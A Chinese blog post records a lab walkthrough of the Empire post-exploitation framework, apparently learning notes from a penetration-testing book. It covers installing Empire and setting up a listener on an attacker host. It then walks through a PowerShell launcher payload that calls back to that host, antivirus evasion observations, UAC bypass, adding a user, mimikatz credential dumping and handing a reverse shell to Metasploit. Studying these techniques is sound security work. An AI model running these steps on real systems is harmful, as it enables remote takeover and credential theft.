初识Empire

前言

最近在看《Web安全攻防》一书,将不熟悉的Empire进行实验操作来学习。

参考资料《Web安全攻防渗透测试实战指南》

Empire安装

安装Empire工具比较简单。。选择直接安装在kali

git clone  https://github.com/EmpireProject/Empire.git

cd /Empire/setup

./install


实验操作

靶机:windows service pack1 虚拟机 (装有电脑管家)(IP:192.168.72.154)

攻击机:kali(IP:192.168.72.163)

启动Empire

ok
next

listeners  监听

uselistener

uselistener  http  选择监听的模式

info
execute

info  查看参数设置

set  Name  cseroad    设置名字

set Host  192.168.72.163  设置本主机IP

execute  执行监听

list

list  查看列出当前激活的listener

agents  查看会话

注:开启多个监听时,名称必须不一样,而且端口也必须不一样,否则不能创建。

powershell

launcher  powershell  cseroad  生成payload

将该代码在靶机win7的cmd下运行。

powershell
active

可以看到Empire已经上线了一个名为UVXTMAE7的主机,且电脑管家没有提示。

在360上运行则出现了提示

360

更多木马生成:

后渗透测试神器Empire的详解

agent

interact  UVXTMAE7  命令进入会话

ipconfig
sysinfo
截图

shell  ipconfig  执行系统命令

systinfo  查看该靶机基本信息

sc  截图

更多命令:help

提权

bypassuac

bypassuac  cseroad  自动提权

list

*表示提权成功

success

添加用户成功。

mimikatz
password

mimikatz  读取hash,获取管理员密码

结合metasploit

usemodule
info

usemodule  code_execution/invoke_shellCode  使用模块

set Lhost  192.168.72.163

set  Lport  8088

options
sessions

msf设置的参数和use  module 保持一致。

得到Empire反弹的shell

你可能感兴趣的:(初识Empire)